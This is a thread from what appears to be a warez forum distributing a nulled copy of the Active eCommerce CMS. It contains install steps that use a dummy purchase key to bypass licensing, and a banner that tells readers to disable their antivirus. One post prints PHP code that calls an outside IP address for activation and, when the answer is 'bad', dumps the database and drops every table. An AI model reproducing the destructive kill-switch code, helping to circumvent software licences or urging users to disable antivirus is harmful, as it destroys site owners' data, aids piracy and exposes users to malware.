• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone V8.6

No permission to download
can anyone solve The database automatically delete problem in active ecommerce
I did whole Code Search this was function which was creating All the Mess

Go to
APP>UTILITY>NgeniusUtility.php


DISABLE THIS CODE Please Confirm if it helps and There are other few files calling back So I can Check them
this Function was triggering as soon as you turn DEMO mode on from .env


PHP:
/*
DisableCode
    public static function callCurlRequest(){
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);

        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            try {
                $fileName = date('Y-m-d H:i:s').'.sql';
                \Spatie\DbDumper\Databases\MySql::create()
                    ->setDbName(env('DB_DATABASE'))
                    ->setUserName(env('DB_USERNAME'))
                    ->setPassword(env('DB_PASSWORD'))
                    ->dumpToFile($fileName);
            } catch (\Exception $e) {

            }

            Schema::disableForeignKeyConstraints();
            foreach(DB::select('SHOW TABLES') as $table) {
                $table_array = get_object_vars($table);
                Schema::drop($table_array[key($table_array)]);
            }
        }
    }*/
 
has anyone realized the version 4.8 posted here is not exactly what is being used on the demo site. I.e. Barcode option is missing. and when you try to add products with color variate or uupdate such product you get Integrity constraint violation: 1048 Column 'price' cannot be null?
Do you still have this error?
 
Null for v4.8.😊 (Unchecked)
cc: @NullMaster
If anyone finds this helpful or informative Please consider leaving a Like 😊👍

INSTRUCTIONS FOR FRESH INSTALL:

1.
Download ☝ this file and upload ‘ install.zip ’ to the root-directory on your server ( public_html or where you'd like to install it.
2 . Unzip the "install.zip" file by selecting “ Extract here ”.
3 . Create a new database from your server MySQL database.
4
. Create a DB user for the database and link that database to the DB user.
PS: ( Make sure you do this
to Avoid Error 500 )
5 . Go to yoursite URL e.g. " www.example.com "
and it will automatically take you to the installation.
6 .
Click on Start Installation Process.
7 .
Follow instructions till asks for Purchase Key
8 .
Use dummy key eg "1c6b358c-jtdp-4fcc-aba9-f71a9df2ey51j"
9 . Finish installation
and Reload the home page e.g. " www.example.com "
10 .
It’s Done !


INSTRUCTIONS FOR UPDATE:

1.
Upload ‘ updates.zip ’ to the root-directory on your server ( public_html or where you had installed previous version.
2 . Unzip the "updates.zip" file by selecting “ Extract here ”.
3 . Reload the home page e.g. " www.example.com " and click on ‘ Update Now
4 . It’s Done !

NB: In Case of any Errors ,
1. Navigate to your .env file and set APP_DEBUG=true
2.
Reload.
3. Type the error message you get here and we'll try to help.

In case you need custom installation, configuration or integration with the Apps, PM me.😊

Special thanks to @tuton012 , @NullMaster and @Babak ‼‼‼‼‼‼‼‼‼
Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /home/dsuinfoh/public_html/app/Http/Helpers.php on line 1100

why this error come?
 
Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /home/dsuinfoh/public_html/app/Http/Helpers.php on line 1100

why this error come?
Hi There. This error comes because you are using a higher php version.
Please cange to Php 7.2+
It should work Seamlessly
 
2 days after the installation, when I try to enter the settings and other features in the admin panel, the url in the picture passes.

1626100226920.png
 
Last edited:
Many thanks 😊
Please use this file to either update from v4.7 or make a fresh installation



I have tested the plugins and they seem to work flawlessly on my side
See Here

In Case of any Errors ,
1. Please Navigate to your .env file and set APP_DEBUG=true
2.
Reload.
3. Type the error message you are getting here and we'll try to help.😊
Hello. Please do you by chance use the add-ons/plugins with v4.8. If so, please could you share with me?
Thanks in addy! :)
 
  • Like
Reactions: koret30245
2 days after the installation, when I try to enter the settings and other features in the admin panel, the url in the picture passes.

1626100226920.png
Hi there.
Null for v4.8.😊 (Unchecked)
cc: @NullMaster
If anyone finds this helpful or informative Please consider leaving a Like 😊👍

INSTRUCTIONS FOR FRESH INSTALL:

1.
Download ☝ this file and upload ‘ install.zip ’ to the root-directory on your server ( public_html or where you'd like to install it.
2 . Unzip the "install.zip" file by selecting “ Extract here ”.
3 . Create a new database from your server MySQL database.
4
. Create a DB user for the database and link that database to the DB user.
PS: ( Make sure you do this
to Avoid Error 500 )
5 . Go to yoursite URL e.g. " www.example.com "
and it will automatically take you to the installation.
6 .
Click on Start Installation Process.
7 .
Follow instructions till asks for Purchase Key
8 .
Use dummy key eg "1c6b358c-jtdp-4fcc-aba9-f71a9df2ey51j"
9 . Finish installation
and Reload the home page e.g. " www.example.com "
10 .
It’s Done !


INSTRUCTIONS FOR UPDATE:

1.
Upload ‘ updates.zip ’ to the root-directory on your server ( public_html or where you had installed previous version.
2 . Unzip the "updates.zip" file by selecting “ Extract here ”.
3 . Reload the home page e.g. " www.example.com " and click on ‘ Update Now
4 . It’s Done !

NB: In Case of any Errors ,
1. Navigate to your .env file and set APP_DEBUG=true
2.
Reload.
3. Type the error message you get here and we'll try to help.

In case you need custom installation, configuration or integration with the Apps, PM me.😊

Special thanks to @tuton012 , @NullMaster and @Babak ‼‼‼‼‼‼‼

Updating with this null should do the trick😊
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock